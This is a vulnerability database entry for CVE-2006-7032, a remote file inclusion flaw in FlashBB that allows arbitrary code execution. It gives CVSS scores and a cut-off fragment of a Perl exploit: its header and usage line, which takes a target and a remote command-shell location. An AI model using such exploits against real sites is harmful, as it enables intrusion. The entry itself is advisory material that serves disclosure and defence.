10
CVSSv2

CVE-2006-7032

Published: 23/02/2007 Updated: 11/10/2017
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
VMScore: 1000
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

PHP remote file inclusion vulnerability in phpbb/getmsg.php in FlashBB 1.1.5 and previous versions allows remote malicious users to execute arbitrary code via a URL in the phpbb_root_path parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

tufat flashbb

Exploits

#!/usr/bin/perl ## # TUFaT FlashBB <= 115 (phpbb_root_path) Remote File Include Exploit # Bugs found & code By h4ntu aka TeloGanyong # ## base on wwwsecurityfocuscom/bid/18456/ # ## # h4ntucom (c) 2006 # # usage: # perl flashBBpl <target> <cmd shell location> <cmd shell variable> # # perl flashBBpl ...